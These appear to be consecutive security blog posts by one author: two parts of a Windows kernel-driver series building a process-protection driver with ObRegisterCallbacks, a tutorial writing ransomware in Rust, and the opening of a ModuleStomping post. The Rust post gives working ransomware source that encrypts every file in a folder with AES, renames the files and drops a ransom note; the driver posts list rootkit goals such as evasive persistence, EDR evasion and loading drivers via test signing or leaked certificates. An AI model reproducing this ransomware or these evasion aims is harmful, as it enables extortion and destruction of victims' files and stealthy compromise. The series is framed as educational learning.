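    const std::vector<Item> sent = { {1, 100}, {2, 200} };
    unsigned char buffer[64] = {};
    std::vector<Item> received;

    const std::size_t written = writeItemList(sent, buffer, sizeof(buffer));
    assert(written != 0);
    assert(readItemList(buffer, written, received));
    assert(received.size() == sent.size());
}
```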

Conclusion

This time, it was a relatively short blog post, but a very important one for anyone who wants to write a kernel-mode driver correctly and learn to solve the problems it brings.

In this blog, we learned how to debug a kernel driver and how to properly exchange data between our kernel driver and the user mode. In the next blog, we will understand the power of callbacks and learn about the different types that are available to us.

I hope that you enjoyed the blog and I’m available on Twitter, Telegram and by Mail to hear what you think about it! This blog series is following my learning curve of kernel mode development and if you like this blog post you can check out Nidhogg on GitHub.

Lord Of The Ring0 - Part 2 | A tale of routines, IOCTLs and IRPs

4 August 2022 at 00:00

Prologue

In the last blog post, we had an introduction to kernel development, the difficulties of loading a driver and how to bypass them. In this blog, I will write more about callbacks, how to start writing a rootkit and the difficulties I encountered during my development of Nidhogg.

As I promised to bring both defensive and offensive points of view, we will create a driver that can be used for both blue and red teams - A process protector driver.

P.S: The name Nidhogg was chosen after the Norse dragon that lies underneath Yggdrasil :).

Talking with the user mode 101

A driver should be (most of the time) controllable from the user mode by some process. An example would be Sysmon: when you change the configuration or turn it off or on, it tells its kernel part to stop performing certain operations, to work by an updated policy, or just to shut down when you decide to unload Sysmon. As kernel drivers, we have two ways to communicate with the user mode: via DIRECT_IO or via IOCTLs. The advantage of DIRECT_IO is that it is simpler to use and gives you more control, and the advantage of IOCTLs is that they are safer and more developer friendly. In this blog series, we will use the IOCTLs approach.

To better understand what an IOCTL is, let’s look at an IOCTL structure:

#define MY_IOCTL CTL_CODE(DeviceType, FunctionNumber, Method, Access)

The device type indicates the type of the device (different types of hardware and software drivers). For software drivers the number doesn’t matter much, but the convention is to use 0x8000 for third-party software drivers like ours.

The second parameter indicates the function “index” in our driver, it could be any number but the convention suggests starting from 0x800.

The method parameter indicates how the input and output should be handled by the driver. It can be METHOD_BUFFERED, METHOD_IN_DIRECT, METHOD_OUT_DIRECT or METHOD_NEITHER.

The last parameter indicates the access that the caller must have requested when opening the device in order to send this IOCTL: write access (FILE_WRITE_ACCESS), read access (FILE_READ_ACCESS) or no specific access (FILE_ANY_ACCESS).
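To see how the four parameters end up in one 32-bit number, here is a small sketch that mirrors the bit layout of the CTL_CODE macro in portable C++. The function and constant names (ctlCode, deviceTypeOf, kMethodBuffered and so on) are my own for this example; the numeric values follow the Windows headers.

```cpp
#include <cassert>
#include <cstdint>

// Transfer methods and access values, as defined in the Windows headers.
constexpr std::uint32_t kMethodBuffered  = 0;
constexpr std::uint32_t kMethodInDirect  = 1;
constexpr std::uint32_t kMethodOutDirect = 2;
constexpr std::uint32_t kMethodNeither   = 3;
constexpr std::uint32_t kFileAnyAccess   = 0;
constexpr std::uint32_t kFileReadAccess  = 1;
constexpr std::uint32_t kFileWriteAccess = 2;

// Same layout as CTL_CODE: device type (bits 16-31), access (bits 14-15),
// function (bits 2-13) and method (bits 0-1).
constexpr std::uint32_t ctlCode(std::uint32_t deviceType, std::uint32_t function,
                                std::uint32_t method, std::uint32_t access) {
    return (deviceType << 16) | (access << 14) | (function << 2) | method;
}

// The reverse direction: pulling the fields back out of a control code.
constexpr std::uint32_t deviceTypeOf(std::uint32_t code) { return code >> 16; }
constexpr std::uint32_t accessOf(std::uint32_t code)     { return (code >> 14) & 0x3; }
constexpr std::uint32_t functionOf(std::uint32_t code)   { return (code >> 2) & 0xFFF; }
constexpr std::uint32_t methodOf(std::uint32_t code)     { return code & 0x3; }

// The code used in this series: device type 0x8000, function 0x800.
constexpr std::uint32_t kIoctlDemo = ctlCode(0x8000, 0x800, kMethodBuffered, kFileAnyAccess);
static_assert(kIoctlDemo == 0x80002000, "unexpected control code layout");

// Usage example.
void example() {
    assert(deviceTypeOf(kIoctlDemo) == 0x8000);
    assert(functionOf(kIoctlDemo) == 0x800);
    assert(methodOf(kIoctlDemo) == kMethodBuffered);
    assert(accessOf(kIoctlDemo) == kFileAnyAccess);
}
```

This is also handy when debugging: given a raw control code from a dump, the helper functions tell you which function number and transfer method it refers to.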

To use IOCTLs, on the driver’s initialization you will need to set a function that parses an IRP and knows how to handle the IOCTLs. Such a function is defined as follows:

NTSTATUS MyDeviceControl(
    [in] PDEVICE_OBJECT DeviceObject, 
    [in] PIRP           Irp
);

IRP in a nutshell is a structure that represents an I/O request packet. You can read more about it in MSDN.

When communicating with the user mode we need to define two more things: The device object and the symbolic link. The device object is the object that handles the I/O requests and allows us as a user-mode program to communicate with the kernel driver. The symbolic link creates a linkage in the GLOBAL?? directory so the DeviceObject will be accessible from the user mode and usually looks like \??\DriverName.

Callback Routines

To understand how to use callback routines, let’s first understand WHAT they are. The callback routine is a feature that allows kernel drivers to register for certain events, for example process operations (such as getting a handle to a process), and affect their result. When a kernel driver registers for an operation, it says “I’m interested in this event and would like to be notified whenever it occurs”, and then each time the event occurs the driver gets notified and a function is executed.

One of the most notable ways to register for an operation is with the ObRegisterCallbacks function:

NTSTATUS ObRegisterCallbacks(
  [in]  POB_CALLBACK_REGISTRATION CallbackRegistration,
  [out] PVOID                     *RegistrationHandle
);

typedef struct _OB_CALLBACK_REGISTRATION {
  USHORT                    Version;
  USHORT                    OperationRegistrationCount;
  UNICODE_STRING            Altitude;
  PVOID                     RegistrationContext;
  OB_OPERATION_REGISTRATION *OperationRegistration;
} OB_CALLBACK_REGISTRATION, *POB_CALLBACK_REGISTRATION;

typedef struct _OB_OPERATION_REGISTRATION {
  POBJECT_TYPE                *ObjectType;
  OB_OPERATION                Operations;
  POB_PRE_OPERATION_CALLBACK  PreOperation;
  POB_POST_OPERATION_CALLBACK PostOperation;
} OB_OPERATION_REGISTRATION, *POB_OPERATION_REGISTRATION;

Using this function we can register two types of callbacks in an OperationRegistration: ObjectPreCallback and ObjectPostCallback (the PreOperation and PostOperation members). The pre-operation callback happens before the operation is executed, and the post-operation callback happens after the operation is executed and before the user gets back the output.

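Using ObRegisterCallbacks you can register for the following ObjectTypes (you can see the full list defined in WDM.h). Note that Microsoft’s documentation lists only PsProcessType, PsThreadType and ExDesktopObjectType as supported: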

  • PsProcessType
  • PsThreadType
  • ExDesktopObjectType
  • IoFileObjectType
  • CmKeyObjectType
  • ExEventObjectType
  • SeTokenObjectType

To use this function, you will need to create a function with a unique signature as follows (depending on your needs and if you are using PreOperation or PostOperation):

OB_PREOP_CALLBACK_STATUS PobPreOperationCallback(
  [in] PVOID RegistrationContext,
  [in] POB_PRE_OPERATION_INFORMATION OperationInformation
);

void PobPostOperationCallback(
  [in] PVOID RegistrationContext,
  [in] POB_POST_OPERATION_INFORMATION OperationInformation
);

Now that we understand better what callbacks are we can write our first driver - A kernel driver that protects a process.

Let’s build - Process Protector

To build a process protector we first need to understand how it will work. What we want is basic protection against any process that attempts to kill our process; the protected process could be our malicious program or our precious Sysmon agent. To kill a process, the killing process needs a handle with the PROCESS_TERMINATE permission, and as we said before, we can register for certain events like a request for a handle to a process. So as a driver, you can remove permissions from the request and return a handle without a specific permission, which in our case is PROCESS_TERMINATE.

To start with the development we will need a DriverEntry function:

#include <ntddk.h>

// Definitions
#define IOCTL_PROTECT_PID    CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define PROCESS_TERMINATE 1
#define DRIVER_PREFIX "Protector: "

// Prototypes
DRIVER_UNLOAD ProtectorUnload;
DRIVER_DISPATCH ProtectorCreateClose, ProtectorDeviceControl;

OB_PREOP_CALLBACK_STATUS PreOpenProcessOperation(PVOID RegistrationContext, POB_PRE_OPERATION_INFORMATION Info);

// Globals
PVOID regHandle;
ULONG protectedPid;

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING) {
    NTSTATUS status = STATUS_SUCCESS;
    UNICODE_STRING deviceName = RTL_CONSTANT_STRING(L"\\Device\\Protector");
    UNICODE_STRING symName = RTL_CONSTANT_STRING(L"\\??\\Protector");
    PDEVICE_OBJECT DeviceObject = nullptr;

    OB_OPERATION_REGISTRATION operations[] = {
        {
            PsProcessType,
            OB_OPERATION_HANDLE_CREATE | OB_OPERATION_HANDLE_DUPLICATE,
            PreOpenProcessOperation, nullptr
        }
    };

    OB_CALLBACK_REGISTRATION reg = {
        OB_FLT_REGISTRATION_VERSION,
        1,
        RTL_CONSTANT_STRING(L"12345.6879"),
        nullptr,
        operations
    };

    ...

Before we continue, let’s explain what’s going on. We defined a deviceName with our driver name (Protector) and a symbolic link with the same name (the symName variable). We also defined an array of operations that we want to register for - in our case it is just PsProcessType, for each handle creation or handle duplication.

We used this array to finish the registration definition - the number 1 means that only one operation is registered, and 12345.6879 defines the altitude. An altitude is a unique decimal number (represented as a UNICODE_STRING) that is used to identify a registration and relate it to a certain driver.

As you probably noticed, the DriverEntry is “missing” the name of the RegistryPath parameter. Instead of writing UNREFERENCED_PARAMETER(RegistryPath), we can just leave the parameter unnamed and it will be unreferenced.

Now, let’s do the actual registration and finish the DriverEntry function:

...

    status = IoCreateDevice(DriverObject, 0, &deviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, &DeviceObject);

    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "failed to create device object (status=%08X)\n", status));
        return status;
    }

    status = IoCreateSymbolicLink(&symName, &deviceName);

    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "failed to create symbolic link (status=%08X)\n", status));
        IoDeleteDevice(DeviceObject);
        return status;
    }

    status = ObRegisterCallbacks(&reg, &regHandle);

    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "failed to register the callback (status=%08X)\n", status));
        IoDeleteSymbolicLink(&symName);
        IoDeleteDevice(DeviceObject);
        return status;
    }

    DriverObject->DriverUnload = ProtectorUnload;
    DriverObject->MajorFunction[IRP_MJ_CREATE] = DriverObject->MajorFunction[IRP_MJ_CLOSE] = ProtectorCreateClose;
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = ProtectorDeviceControl;

    KdPrint(("DriverEntry completed successfully\n"));
    return status;
}

Using the functions IoCreateDevice and IoCreateSymbolicLink we created a device object and a symbolic link. After making sure our driver can be reached from the user mode, we registered our callback with ObRegisterCallbacks and defined important major functions such as ProtectorCreateClose (I will explain it soon) and ProtectorDeviceControl to handle the IOCTL.

The ProtectorUnload function is very simple and just does the same cleanup we did when the status wasn’t successful: it unregisters the callback with ObUnRegisterCallbacks and deletes the symbolic link and the device object.

The next thing on the list is to implement the ProtectorCreateClose function. The function is responsible for completing the IRP. Since in this driver we don’t have multiple device objects and we are not doing much with it, we can handle the completion of the relevant IRP in our DeviceControl function and, for any other IRP, just always complete it with a successful status.

NTSTATUS ProtectorCreateClose(PDEVICE_OBJECT, PIRP Irp) {
    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}

The device control is also fairly simple as we have only one IOCTL to handle:

NTSTATUS ProtectorDeviceControl(PDEVICE_OBJECT, PIRP Irp) {
    NTSTATUS status = STATUS_SUCCESS;
    auto stack = IoGetCurrentIrpStackLocation(Irp);

    switch (stack->Parameters.DeviceIoControl.IoControlCode) {
        case IOCTL_PROTECT_PID:
        {
            auto size = stack->Parameters.DeviceIoControl.InputBufferLength;

            if (size == 0 || size % sizeof(ULONG) != 0) {
                status = STATUS_INVALID_BUFFER_SIZE;
                break;
            }

            auto data = (ULONG*)Irp->AssociatedIrp.SystemBuffer;
            protectedPid = *data;
            break;
        }
        default:
            status = STATUS_INVALID_DEVICE_REQUEST;
            break;
    }

    Irp->IoStatus.Status = status;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return status;
}

As you noticed, to see the IOCTL, get the input and perform more operations in the future, we need to use the IRP’s stack location. I won’t go over its entire structure but you can view it in MSDN. To make it clearer: when using the METHOD_BUFFERED option, the input and output buffers are delivered via the SystemBuffer, which is reached through the IRP itself (Irp->AssociatedIrp.SystemBuffer), while the control code and the buffer lengths are located in the IRP’s stack location.

After we got the stack and verified the IOCTL, we need to check our input because wrong input handling can cause a BSOD. When the input verification is completed all we have to do is just change the protectedPid to the wanted PID.

With the DeviceControl and the CreateClose functions, we can create the last function in the kernel driver - The PreOpenProcessOperation.

OB_PREOP_CALLBACK_STATUS PreOpenProcessOperation(PVOID, POB_PRE_OPERATION_INFORMATION Info) {
    if (Info->KernelHandle)
        return OB_PREOP_SUCCESS;
    
    auto process = (PEPROCESS)Info->Object;
    auto pid = HandleToULong(PsGetProcessId(process));
    
    // Protecting our pid and removing PROCESS_TERMINATE.
    if (pid == protectedPid) {
        Info->Parameters->CreateHandleInformation.DesiredAccess &= ~PROCESS_TERMINATE;
    }
    
    return OB_PREOP_SUCCESS;
}

Very simple, isn’t it? Just a bitwise AND with the complement of PROCESS_TERMINATE and we are done.

Now, only one thing is left: allowing our driver to register for operations. This is done in the project settings in Visual Studio, by adding the /integritycheck switch to the linker command line.

Now that we have finished the kernel driver part, let’s go to the user-mode part.

Protector’s User mode Part

The user-mode part is even simpler, as we just need to create a handle to the device object and send the wanted PID.

#include <iostream>
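#include <Windows.h>

// Must match the definition in the driver.
#define IOCTL_PROTECT_PID CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)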

int main(int argc, const char* argv[]) {
    DWORD bytes;

    if (argc != 2) {
        std::cout << "Usage: " << argv[0] << " <pid>" << std::endl;
        return 1;
    }

    DWORD pid = atoi(argv[1]);
    HANDLE device = CreateFile(L"\\\\.\\Protector", GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr);

    if (device == INVALID_HANDLE_VALUE) {
        std::cout << "Failed to open device" << std::endl;
        return 1;
    }

    BOOL success = DeviceIoControl(device, IOCTL_PROTECT_PID, &pid, sizeof(pid), nullptr, 0, &bytes, nullptr);
    CloseHandle(device);

    if (!success) {
        std::cout << "Failed in DeviceIoControl: " << GetLastError() << std::endl;
        return 1;
    }
    
    std::cout << "Protected process with pid: " << pid << std::endl;
    return 0;
}

Congratulations on writing your very first functional kernel driver!

Bonus - Anti-dumping

To prevent a process from being dumped all we have to do is just remove more permissions such as PROCESS_VM_READ, PROCESS_DUP_HANDLE and PROCESS_VM_OPERATION. An example can be found in Nidhogg’s ProcessUtils file.
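The access-stripping logic of both the process protection and the anti-dumping bonus can be sketched in portable C++. This is an illustration under my own assumptions, not the code from Nidhogg's ProcessUtils: filterDesiredAccess and the k-prefixed constants are hypothetical names, while the numeric values are the process access rights from the Windows headers.

```cpp
#include <cassert>
#include <cstdint>

// Process access rights, with the values from the Windows headers.
constexpr std::uint32_t kProcessTerminate        = 0x0001;
constexpr std::uint32_t kProcessVmOperation      = 0x0008;
constexpr std::uint32_t kProcessVmRead           = 0x0010;
constexpr std::uint32_t kProcessDupHandle        = 0x0040;
constexpr std::uint32_t kProcessQueryInformation = 0x0400;

// Rights removed to block killing, and the extra rights removed to block dumping.
constexpr std::uint32_t kAntiKillMask = kProcessTerminate;
constexpr std::uint32_t kAntiDumpMask = kProcessVmRead | kProcessDupHandle | kProcessVmOperation;

// Models what the pre-operation callback does to the requested access mask.
std::uint32_t filterDesiredAccess(std::uint32_t desiredAccess, std::uint32_t targetPid,
                                  std::uint32_t protectedPid, bool antiDump) {
    // Handles to other processes are left untouched.
    if (targetPid != protectedPid)
        return desiredAccess;

    std::uint32_t denied = kAntiKillMask;
    if (antiDump)
        denied |= kAntiDumpMask;

    // AND with the complement clears only the denied bits.
    return desiredAccess & ~denied;
}

// Usage example.
void example() {
    const std::uint32_t requested = kProcessTerminate | kProcessVmRead | kProcessQueryInformation;

    // Protection only: the caller keeps everything except PROCESS_TERMINATE.
    assert(filterDesiredAccess(requested, 1234, 1234, false) == (kProcessVmRead | kProcessQueryInformation));

    // With anti-dumping, PROCESS_VM_READ is gone as well.
    assert(filterDesiredAccess(requested, 1234, 1234, true) == kProcessQueryInformation);
}
```

Note that the caller still receives a valid handle; it is just a weaker one than requested, so the operations that need the removed rights fail later.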

Conclusion

In this blog, we got a better understanding of how to write a driver, how to communicate with it and how to use callbacks. In the next blog, we will dive deeper into this world and learn more about kernel development.

I hope that you enjoyed the blog and I’m available on Twitter, Telegram and by Mail to hear what you think about it! This blog series is following my learning curve of kernel mode development and if you like this blog post you can check out Nidhogg on GitHub.

Lord Of The Ring0 - Part 1 | Introduction

14 July 2022 at 00:00


Introduction

This blog post series isn’t something I normally do; it will be more like a journey that I document during the development of my project Nidhogg. In this series of blogs (I don’t know yet how long it will be), I’ll write about difficulties I encountered while developing Nidhogg and tips & tricks for everyone who wants to start creating a stable kernel mode driver in 2022.

This series will be about WDM type of kernel drivers, developed in VS2019. To install it, you can follow the guide in MSDN. I highly recommend that you test EVERYTHING in a virtual machine to avoid crashing your computer.

Without further delays - Let’s start!

Kernel Drivers In 2022

The first question you might ask yourself is: How can a kernel driver help me in 2022? There are a lot of 1337 things that I can do in user mode without the pain of developing a driver and constantly crashing my computer.

From a red team perspective, I think that there are several things that a kernel driver can give that user mode can’t.

  • Being an efficient backdoor with extremely evasive persistence.
  • Performing highly privileged operations without depending on an LPE exploit or privileged users.
  • Easily evading AV / EDR hooks.
  • Hiding your implant without suspicious user-mode hooks.

From a blue team perspective, you can log more events and block suspicious operations with methods you won’t be able to do in the user mode.

  • Create a driver to monitor and log specific events (like Sysmon) specially crafted to meet your organization’s needs.
  • Create kernel mode hooks to find advanced rootkits and malware.
  • Provide kernel mode protection to your blue agents (such as OSQuery, Wazuh, etc.).

NOTE: This blog series will focus more on the red team part but I’ll also add the blue team perspective as one affects the other.

Basic driver structure

Like any good programmer, we will start with creating a basic driver to print famous words with an explanation of the basics.

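#include <ntddk.h>

// Forward declaration so DriverEntry can reference the unload routine.
void MyUnload(PDRIVER_OBJECT DriverObject);

extern "C"
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    UNREFERENCED_PARAMETER(RegistryPath);

    // Register the unload routine so the driver can be stopped.
    DriverObject->DriverUnload = MyUnload;
    KdPrint(("Hello World!\n"));
    return STATUS_SUCCESS;
}

// Called when the driver is unloaded.
void MyUnload(PDRIVER_OBJECT DriverObject) {
    UNREFERENCED_PARAMETER(DriverObject);
    KdPrint(("Goodbye World!\n"));
}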

This simple driver prints “Hello World!” when it is loaded and “Goodbye World!” when it is unloaded. Since the parameter RegistryPath is not used, we wrap it in UNREFERENCED_PARAMETER to suppress the unused-parameter warning, which would otherwise fail a build that treats warnings as errors.

Every driver needs to implement at least the two functions shown above.

The DriverEntry is the first function that is called when the driver is loaded and it is very much like the main function for user-mode programs, except it gets two parameters:

  • DriverObject: A pointer to the driver object.
  • RegistryPath: A pointer to a UNICODE_STRING structure that contains the path to the driver’s registry key.

The DriverObject is an important object that will serve us a lot in the future, its definition is:

typedef struct _DRIVER_OBJECT {
  CSHORT             Type;
  CSHORT             Size;
  PDEVICE_OBJECT     DeviceObject;
  ULONG              Flags;
  PVOID              DriverStart;
  ULONG              DriverSize;
  PVOID              DriverSection;
  PDRIVER_EXTENSION  DriverExtension;
  UNICODE_STRING     DriverName;
  PUNICODE_STRING    HardwareDatabase;
  PFAST_IO_DISPATCH  FastIoDispatch;
  PDRIVER_INITIALIZE DriverInit;
  PDRIVER_STARTIO    DriverStartIo;
  PDRIVER_UNLOAD     DriverUnload;
  PDRIVER_DISPATCH   MajorFunction[IRP_MJ_MAXIMUM_FUNCTION + 1];
} DRIVER_OBJECT, *PDRIVER_OBJECT;

But I’d like to focus on the MajorFunction: This is an array of important functions that the driver can implement for IO management in different ways (direct or with IOCTLs), handling IRPs and more.

We will use it for the next part of the series but for now, keep it in mind. (A little tip: Whenever you encounter a driver and you want to know what it is doing make sure to check out the functions inside the MajorFunction array).
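To make the idea of a dispatch table a bit more concrete, here is a toy user-mode model of it. It is not WDK code: ToyDriver, ToyRequest and the handlers are hypothetical stand-ins, and only the IRP_MJ_* values mirror the ones from wdm.h.

```cpp
#include <array>
#include <cassert>
#include <cstddef>

// Major function codes; the values mirror wdm.h.
constexpr std::size_t kIrpMjCreate          = 0x00; // IRP_MJ_CREATE
constexpr std::size_t kIrpMjClose           = 0x02; // IRP_MJ_CLOSE
constexpr std::size_t kIrpMjDeviceControl   = 0x0e; // IRP_MJ_DEVICE_CONTROL
constexpr std::size_t kIrpMjMaximumFunction = 0x1b; // IRP_MJ_MAXIMUM_FUNCTION

struct ToyRequest { std::size_t major; };       // stand-in for an IRP
using ToyHandler = int (*)(const ToyRequest&);  // stand-in for PDRIVER_DISPATCH

// Toy handlers; the return values are arbitrary markers, not NTSTATUS codes.
inline int Unsupported(const ToyRequest&)   { return -1; }
inline int CreateClose(const ToyRequest&)   { return 0; }
inline int DeviceControl(const ToyRequest&) { return 1; }

struct ToyDriver {
    // One slot per major function code, like DRIVER_OBJECT::MajorFunction.
    std::array<ToyHandler, kIrpMjMaximumFunction + 1> majorFunction;

    ToyDriver() {
        majorFunction.fill(&Unsupported); // every slot starts with a default
        majorFunction[kIrpMjCreate] = &CreateClose;
        majorFunction[kIrpMjClose] = &CreateClose;
        majorFunction[kIrpMjDeviceControl] = &DeviceControl;
    }

    // Routes a request to the handler registered for its major code.
    int Dispatch(const ToyRequest& request) const {
        assert(request.major <= kIrpMjMaximumFunction);
        return majorFunction[request.major](request);
    }
};
```

Looking at which slots hold something other than the default handler is the toy equivalent of the tip above: it tells you which request types a driver actually cares about.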

To finish the most basic initialization you need to do one more thing: define the DriverUnload function. This function is responsible for stopping callbacks and freeing any memory that was allocated.

When you finish your driver initialization you need to return an NTSTATUS code. This code determines whether the driver will be loaded or not.
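How a status code is classified as success or failure can be sketched outside the kernel as well. The constants below mirror the values from ntstatus.h and NtSuccess applies the same test as the WDK’s NT_SUCCESS macro; ToyDriverEntry and DriverStaysLoaded are hypothetical helpers that only model the decision, they are not part of any real API.

```cpp
#include <cstdint>

using NtStatus = std::int32_t; // NTSTATUS is a signed 32-bit value

// Values mirror ntstatus.h.
constexpr NtStatus kStatusSuccess = 0x00000000;                                      // STATUS_SUCCESS
constexpr NtStatus kStatusUnsuccessful = static_cast<NtStatus>(0xC0000001);          // STATUS_UNSUCCESSFUL
constexpr NtStatus kStatusInsufficientResources = static_cast<NtStatus>(0xC000009A); // STATUS_INSUFFICIENT_RESOURCES

// Same test as NT_SUCCESS: success and informational codes are non-negative,
// warning and error codes have the top bit set and are therefore negative.
constexpr bool NtSuccess(NtStatus status) {
    return status >= 0;
}

// Hypothetical DriverEntry that fails when one of its setup steps fails.
constexpr NtStatus ToyDriverEntry(bool initializationSucceeded) {
    return initializationSucceeded ? kStatusSuccess : kStatusInsufficientResources;
}

// Models the outcome described above: the driver stays loaded only when the
// status returned from its entry point is a success code.
constexpr bool DriverStaysLoaded(NtStatus driverEntryResult) {
    return NtSuccess(driverEntryResult);
}
```

In a real driver this means that returning an error status from DriverEntry after a failed setup step is enough to abort the load, as long as everything allocated up to that point is released first.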

Testing a driver

If you tried to copy & paste and run the code above, you might have noticed that it’s not working.

By default, Windows does not allow loading self-signed drivers, and certainly not unsigned ones. This restriction exists so that a user won’t load a malicious driver and thereby give an attacker even more persistence and privileges on the attacked machine.

Luckily, there is a way to bypass this restriction for testing purposes. To do so, run the following command from an elevated cmd:

bcdedit /set testsigning on

After that, restart your computer and you should be able to load the driver.

To test it out, you can use Dbgview to see the output (don’t forget to compile in the Debug configuration, otherwise KdPrint produces no output). To load the driver, you can use the following commands:

sc create DriverName type= kernel binPath= C:\Path\To\Driver.sys
sc start DriverName 

And to unload it:

sc stop DriverName

You might ask yourself now: how can an attacker deploy a driver? This can be done in several ways:

  • The attacker has found/generated a certificate (the expiration date doesn’t matter).
  • The attacker has enabled test signing (just like we did now).
  • The attacker has a vulnerable driver with a 1-day that allows loading drivers.
  • The attacker has a zero-day that allows loading drivers.

Not so long ago, when Nvidia was breached, a signing certificate was leaked and used by threat actors.

Resources

As we dive deeper into the series, I will use a lot of references from the following amazing resources:

  • Windows Kernel Programming.
  • Windows Internals Part 7.
  • MSDN (I know I said amazing, I lied here).

And you can check out the following repositories for drivers examples:

Conclusion

This blog post may be short but is the start of the coming series of blog posts about kernel drivers and rootkits specifically. Another one, more detailed, will come out soon!

I hope that you enjoyed the blog and I’m available on Twitter, Telegram and by Mail to hear what you think about it! This blog series is following my learning curve of kernel mode development and if you like this blog post you can check out Nidhogg on GitHub.

Rust 101 - Let’s write Rustomware


Introduction

When I first heard about Rust, my first reaction was “Why?”. The language looked to me like a C “wannabe” and I didn’t understand why it was so popular. I started to read more and more about this language and began to like it. To challenge myself, I decided to write a ransomware in Rust. Later on, I ran into trickster0’s amazing repository OffensiveRust and that gave me more motivation to learn Rust. Nowadays I’m creating a unique C2 framework written (mostly) in Rust. If you are familiar with Rust, you can skip to Part 2 below.

The whole code for this blog post is available on my GitHub :).

Rust’s capabilities

The reason I think Rust is an awesome language is that it has a powerful compiler, memory safety, easy syntax and great interaction with the OS. Rust’s compiler alerts on anything that can be problematic, which can be annoying but in the end helps the developer create safer programs. On the other hand, the compiler also takes care of annoying tasks that are required when programming in C, like freeing memory, closing files, etc. Rust is also a cross-platform language, so the same code can be built for different platforms and behave differently depending on the OS.

Part 1 - Hello Rust

Enough talking and let’s start to code! The first thing we want to do is create our program, it can be done with this simple command:

cargo new rustomware
cd rustomware

In the rustomware directory, we will have these files:

rustomware
│   .gitignore
│   Cargo.toml    
│
└───src
│   │   main.rs
│   
└───.git
    │   ...

In the main.rs file, we will write our code, and in Cargo.toml we will declare our dependencies. To build our new program, we will use the following command:

cargo build

Our executable will be in the target/debug directory (because we didn’t use the --release flag, Cargo produces a debug build) and will be called rustomware.exe. You’ll notice that there are a few new files and directories: the Cargo.lock file, and many files under the target directory. I won’t elaborate on them here, but in general the Cargo.lock file records the exact versions of the project’s dependencies so that Cargo can build the project reproducibly. THERE IS NO NEED TO EDIT THOSE FILES. In the target directory, we will have the compiled modules, the executable and the PDB file. Now that we have learned a bit about Rust, we can dive into coding our ransomware.

Part 2 - Iterating the target folder

Like any good ransomware, we will need to have these functionalities:

  • Encrypting files.
  • Decrypting files.
  • Dropping a README file.
  • Adding our extension to the files.

For that, we will need to use crates (modules) to help us out. First things first, we need to be able to get a list of all the files in the target directory from the argv. To do that, we can use the std library and the fs module. To use a module all we need to do is to import it:

use std::{
    env,
    fs
};

fn main() {
    let args: Vec<_> = env::args().collect();
    
    // args[0] is the program name, so we need three entries to read args[2].
    if args.len() < 3 {
        println!("Not enough arguments! Usage: rustsomware <encrypt|decrypt> <folder>");
        return;
    }

    let entries = fs::read_dir(args[2].clone()).unwrap();

    for raw_entry in entries {
        let entry = raw_entry.unwrap();

        if entry.file_type().unwrap().is_file() {
            println!("File Name: {}", entry.path().display())
        }
    }
}

Now we have a program that finds files in a folder. Notice that we used the unwrap() method to get the result. It is required because many Rust functions return a Result type that is either Ok or Err, and unwrap() extracts the Ok value or panics on Err. We also cloned the path string before passing it to read_dir; passing a borrow (&args[2]) works just as well and avoids the copy.

Part 3 - Encrypting / Decrypting the files

To encrypt the files, we will use the AES cipher with a hardcoded key and IV. All that is left for us to do is to create a function that is responsible for encrypting the file and changing its extension to .rustsomware. First things first, to be able to encrypt and decrypt we need a crate to help with that. Since the libaes crate isn’t part of the standard library, we need to add it to our project, which can be done by modifying the Cargo.toml file and adding:

[dependencies]
libaes = "0.6.2"

Now, we can create a function that can encrypt and decrypt. For the sake of practice, we will use a hardcoded key and IV but this is NOT recommended at all.

use libaes::Cipher;

fn encrypt_decrypt(file_name: &str, action: &str) -> bool {
    let key = b"fTjWmZq4t7w!z%C*";
    let iv = b"+MbQeThWmZq4t6w9";
    let cipher = Cipher::new_128(key);

    match action {
        "encrypt" => {
            println!("[*] Encrypting {}", file_name);
            let encrypted = cipher.cbc_encrypt(iv, &fs::read(file_name).unwrap());
            fs::write(file_name, encrypted).unwrap();
            let new_filename = format!("{}.rustsomware", file_name);
            fs::rename(file_name, new_filename).unwrap();
        }

        "decrypt" => {
            println!("[*] Decrypting {}", file_name);
            let decrypted = cipher.cbc_decrypt(iv, &fs::read(file_name).unwrap());
            fs::write(file_name, decrypted).unwrap();
            let new_filename = file_name.replace(".rustsomware", "");
            fs::rename(file_name, new_filename).unwrap();
        }

        _ => { 
            println!("[-] Invalid action!");
            return false 
        }
    }

    return true;
}

You can use the key and IV from above or generate them yourself. The code above is a simple example of how to use AES128 with Rust, pretty simple right?

As you saw, Rust has a simple interface with the file system that allows you to rename files and do I/O operations easily. Because this is a simple example the function returns a boolean, but it is recommended to return the error to the calling function for further handling.

Part 4 - Adding pretty prints and README file

Just like any good ransomware, we need to do one more simple thing: add a README file. For the sake of learning, we will learn about statically including files in our binary. Create a README.txt file with your ransom message in it (it is recommended to create it in a separate directory inside your project directory, such as the res directory used below, but you can also put it in the src directory). To add the file, all we need to do is use the include_str! macro (everything that ends with ! in Rust is a macro) and save the result to a variable.

...

// Dropping the README.txt file.
let ransom_message = include_str!("../res/README.txt");
let readme_path = format!("{}/README_Rustsomware.txt", args[2].clone());
fs::write(readme_path, ransom_message).unwrap();

As you saw, we can just save it to a file and if we want to do any changes just change the README file and recompile, no code editing is required.

Result: result

Conclusion

In this blog post, you got a taste of Rust’s power and had fun with it by creating a simple program. I think that in the future we will see more and more infosec tools that are written in Rust. The whole code is available on my GitHub, for any questions feel free to ask me on Twitter.

Disclaimer

I’m not responsible for any damage that may occur to your computer. This article is just for educational purposes and is not intended to be used in any other way.

The good, the bad and the stomped function

28 January 2022 at 00:00


Introduction

When I first heard about ModuleStomping I was charmed since it wasn’t like any other known injection method.

